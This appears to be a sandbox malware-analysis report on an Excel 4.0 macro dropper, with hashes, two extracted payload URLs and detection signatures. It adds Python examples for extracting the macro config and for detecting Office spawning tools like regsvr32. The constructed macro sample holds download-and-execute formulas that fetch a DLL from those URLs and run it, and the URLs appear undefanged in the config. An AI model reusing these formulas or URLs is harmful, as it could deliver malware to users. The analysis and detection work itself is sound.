General

  • Target

    31b4be1cc02d1b5a2c9de1ccac2fb4063d7d9cc3692bd1449f7d4477a3ced147

  • Size

    36KB

  • Sample

    230129-x28cqacb5y

  • MD5

    be42208b9b4852b7787910c984672e48

  • SHA1

    8a842fcafbb7c35c9d390064d9031f8481aa8b4f

  • SHA256

    31b4be1cc02d1b5a2c9de1ccac2fb4063d7d9cc3692bd1449f7d4477a3ced147

  • SHA512

    49d12fe027dec967c6f608fe5e8bbf9c5f990634270fc87fe5e39ba043f4ad1b654f6d6d136e1b031041d433643661b891c9ee4b37ed9449f88238649ba633d4

  • SSDEEP

    768:cPqNk3hbdlylKsgqopeJBWhZFGkE+cL2NdAJ0o6y2J6tXJzT:Iok3hbdlylKsgqopeJBWhZFGkE+cL2Ny

Score
10/10

Malware Config

Extracted

  • Language

    xlm4.0

  • Source

    xlm40.dropper

  • URLs

    https://statedauto.com/wp-data.php
    https://markens.online/wp-data.php
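
The config above was recovered from Excel 4.0 (XLM) macro formulas, where droppers of this kind typically fetch their payload with a `CALL("urlmon","URLDownloadToFileA",...)` sheet formula. The following Python is an added example of that extraction step and is not the sandbox's own extractor or anything recovered from this sample: the macro text it parses is constructed to resemble an xlm40 dropper, reusing the two URLs from the report, and the DLL path, `EXEC` line and cell layout are assumptions.

```python
"""Pull download URLs and API calls out of decoded Excel 4.0 (XLM) macro text.

Added example, not part of the sandbox report. SAMPLE_XLM is a constructed
decoded-formula listing (one cell per line) that mimics an xlm40 dropper;
only the two URLs come from the report, everything else is assumed.
"""
import re
from typing import Dict, List
from urllib.parse import urlsplit, urlunsplit

# Constructed sample of decoded XLM formulas (assumed layout, not this sample's real macro).
SAMPLE_XLM = r'''
=IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))),,CLOSE(TRUE))
=CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://statedauto.com/wp-data.php","C:\Users\Public\Documents\wZbY.dll",0,0)
=CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://markens.online/wp-data.php","C:\Users\Public\Documents\wZbY1.dll",0,0)
=EXEC("regsvr32 -s C:\Users\Public\Documents\wZbY.dll")
=HALT()
'''

# URL ends at whitespace, a quote, a closing paren or a comma (the XLM argument separators).
URL_RE = re.compile(r'https?://[^\s"\'),]+', re.IGNORECASE)
# =CALL("<dll>","<export>",...) imports a Win32 API into the sheet.
CALL_RE = re.compile(r'=CALL\("([^"]+)","([^"]+)"', re.IGNORECASE)
# =EXEC("<command line>") launches a process.
EXEC_RE = re.compile(r'=EXEC\("([^"]+)"\)', re.IGNORECASE)


def defang(url: str) -> str:
    """Rewrite a URL for safe reporting: hxxp(s):// scheme and [.] in the host only."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower().replace("http", "hxxp")
    host = parts.netloc.replace(".", "[.]")
    return urlunsplit((scheme, host, parts.path, parts.query, parts.fragment))


def extract_config(xlm_text: str) -> Dict[str, object]:
    """Walk the formula listing and collect URLs, imported APIs and EXEC command lines."""
    urls: List[str] = []
    api_calls: List[str] = []
    execs: List[str] = []
    for raw in xlm_text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = CALL_RE.match(line)
        if m:
            api_calls.append(f"{m.group(1)}!{m.group(2)}")
        m = EXEC_RE.match(line)
        if m:
            execs.append(m.group(1))
        for url in URL_RE.findall(line):
            if url not in urls:  # keep order, drop repeats
                urls.append(url)
    return {
        "language": "xlm4.0",
        "urls": urls,
        "urls_defanged": [defang(u) for u in urls],
        "api_calls": api_calls,
        "exec": execs,
    }


if __name__ == "__main__":
    for key, value in extract_config(SAMPLE_XLM).items():
        print(f"{key}: {value}")
```

In practice the input comes from a tool that decodes the sheet's formulas (including those hidden in very-hidden sheets or built at runtime with `FORMULA`/`CHAR`); the regexes above only see what has already been decoded, so a string-assembled URL would be missed unless the macro is emulated first.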

Targets

    • Target

      31b4be1cc02d1b5a2c9de1ccac2fb4063d7d9cc3692bd1449f7d4477a3ced147

    Score
    10/10
    • Process spawned unexpected child process

      A process started a child it does not normally launch. This typically indicates the parent was compromised via an exploit or, as with an XLM dropper, a macro.

    • Drops file in System32 directory

      A file was written under the Windows System32 directory, a location ordinary user-mode applications have no reason to write to.
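
Both signatures can be reproduced from endpoint telemetry. The Python below is an added example of that detection logic and is not the sandbox's own rule set: it runs over constructed events in a simplified Sysmon shape (process creation with `ParentImage`/`Image`/`CommandLine`, file creation with `Image`/`TargetFilename`), and the allow-lists of expected Office children and trusted System32 writers are assumptions to be tuned per environment.

```python
"""Detect Office parents spawning unexpected children and writes into System32.

Added example, not the sandbox's signatures. Events are constructed in a
simplified Sysmon Event ID 1 / Event ID 11 layout; field names and the
allow-lists are assumptions.
"""
from typing import Dict, List, Tuple

OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
# Children Office launches on its own (assumed baseline; extend from your own telemetry).
EXPECTED_CHILDREN = {"splwow64.exe", "werfault.exe", "dw20.exe", "msosync.exe"}
# Living-off-the-land binaries XLM droppers commonly hand their payload to.
HIGH_RISK_CHILDREN = {
    "regsvr32.exe", "rundll32.exe", "mshta.exe", "wscript.exe", "cscript.exe",
    "powershell.exe", "cmd.exe", "certutil.exe", "msiexec.exe",
}
# Processes that legitimately write under System32 (assumed; servicing stack and installers).
TRUSTED_SYSTEM32_WRITERS = {"trustedinstaller.exe", "tiworker.exe", "msiexec.exe", "svchost.exe"}
SYSTEM32_PREFIX = "c:\\windows\\system32\\"

# Constructed process-creation events.
SAMPLE_PROCESS_EVENTS: List[Dict[str, str]] = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32 -s C:\Users\Public\Documents\wZbY.dll"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\splwow64.exe", "CommandLine": "splwow64.exe"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\regsvr32.exe", "CommandLine": "regsvr32 /s setup.dll"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Users\bob\AppData\Local\Temp\update.exe", "CommandLine": "update.exe"},
]

# Constructed file-creation events.
SAMPLE_FILE_EVENTS: List[Dict[str, str]] = [
    {"Image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "TargetFilename": r"C:\Windows\System32\Tasks\wZbY"},
    {"Image": r"C:\Windows\System32\svchost.exe",
     "TargetFilename": r"C:\Windows\System32\config\systemprofile\AppData\cache.dat"},
    {"Image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "TargetFilename": r"C:\Users\Public\Documents\wZbY.dll"},
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify_child(event: Dict[str, str]) -> str:
    """'ignore' for non-Office parents, else 'expected', 'high' or 'medium'."""
    parent = basename(event["ParentImage"])
    child = basename(event["Image"])
    if parent not in OFFICE_PARENTS:
        return "ignore"
    if child in EXPECTED_CHILDREN:
        return "expected"
    if child in HIGH_RISK_CHILDREN:
        return "high"
    return "medium"  # unknown child under Office still warrants a look


def unexpected_children(events: List[Dict[str, str]]) -> List[Tuple[str, str, str]]:
    """(parent, child, severity) for every Office child that is not on the baseline."""
    hits = []
    for e in events:
        sev = classify_child(e)
        if sev in ("high", "medium"):
            hits.append((basename(e["ParentImage"]), basename(e["Image"]), sev))
    return hits


def is_system32_drop(event: Dict[str, str]) -> bool:
    """True when an untrusted process writes a file under C:\\Windows\\System32."""
    target = event["TargetFilename"].lower()
    return target.startswith(SYSTEM32_PREFIX) and basename(event["Image"]) not in TRUSTED_SYSTEM32_WRITERS


def system32_drops(events: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """(writer, target) for every flagged System32 write."""
    return [(basename(e["Image"]), e["TargetFilename"]) for e in events if is_system32_drop(e)]


if __name__ == "__main__":
    for hit in unexpected_children(SAMPLE_PROCESS_EVENTS):
        print("unexpected child:", hit)
    for drop in system32_drops(SAMPLE_FILE_EVENTS):
        print("system32 drop:", drop)
```

The split between `high` and `medium` matters operationally: an Office parent launching `regsvr32.exe` is the textbook XLM dropper chain and should page someone, while an unknown child is worth triage but will also catch add-ins and updaters until the baseline is tuned.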

MITRE ATT&CK Matrix (ATT&CK v6)

  • Defense Evasion

    Modify Registry, T1112 (1)

  • Discovery

    Query Registry, T1012 (2)
    System Information Discovery, T1082 (2)
